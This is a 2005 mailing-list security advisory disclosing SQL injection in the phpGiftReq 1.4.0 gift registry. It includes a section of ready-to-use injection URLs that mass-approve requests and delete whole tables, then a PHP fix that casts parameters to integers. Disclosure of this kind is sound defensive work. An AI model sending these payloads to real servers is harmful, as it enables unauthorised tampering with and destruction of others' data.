lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <41EAA8C8.6050600@iname.com>
Date: Sun, 16 Jan 2005 18:47:52 +0100
From: Madelman <madelman@...me.com>
To: bugs@...uritytracker.com, bugtraq@...urityfocus.com,
        full-disclosure@...ts.netsys.com, news@...uriteam.com,
        staff@...ketstormsecurity.com, vuln@...unia.com
Subject: phpGiftReq SQL Injection


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: phpGiftReq SQL Injection
Vulnerability discovery: Madelman <madelman AT iname.com>
Date: 16/01/2005
Severity: Moderately critical

Summary:
- --------

The PHP Gift Registry is a web-enabled gift registry intended for use
among a circle of family members or friends
(from vendor site: http://phpgiftreg.sourceforge.net/)

phpGiftReq doesn't validate the parameters. This allows SQL Injection
and modification of data in the database.

This vulnerability has been tested with phpGiftReq 1.4.0

Details:
- --------

Acknowledge all messages
http://[SERVER]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1

Approve all pending requests
http://[SERVER]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1

Decline all pending requests
http://[SERVER]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1

Inserts current shopper for buying to user 3 without need for approval
http://[SERVER]/phpgiftreg/index.php?action=request&shopfor=3%2c0%29%2c%2899%2c100

Delete all data from table shoppers
http://[SERVER]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1

Delete all data from table items
http://[SERVER]/phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1

I'm fairly sure there are a lot more places where SQL can be injected,
but I don't havetime to check them all.


Solution:
- ---------

All parameters should be converted to integers before creating the query.

Example:

Substitute

if ($action == "ack") {
~    $query = "UPDATE messages SET isread = 1 WHERE messageid = " .
$_GET["messageid"];
~    mysql_query($query) or die("Could not query: " . mysql_error());
}

with

if ($action == "ack") {
~    $query = "UPDATE messages SET isread = 1 WHERE messageid = " .
((int) $_GET["messageid"]);
~    mysql_query($query) or die("Could not query: " . mysql_error());
}


Timeline
- --------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFB6qif3RWooxY20cIRAmSdAKCJEpPvYyfMpLC0YVP0XMz7OK7maQCcDZOC
DI/zEDH+ORCaUt2uvRiL1eo=
=44JS
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ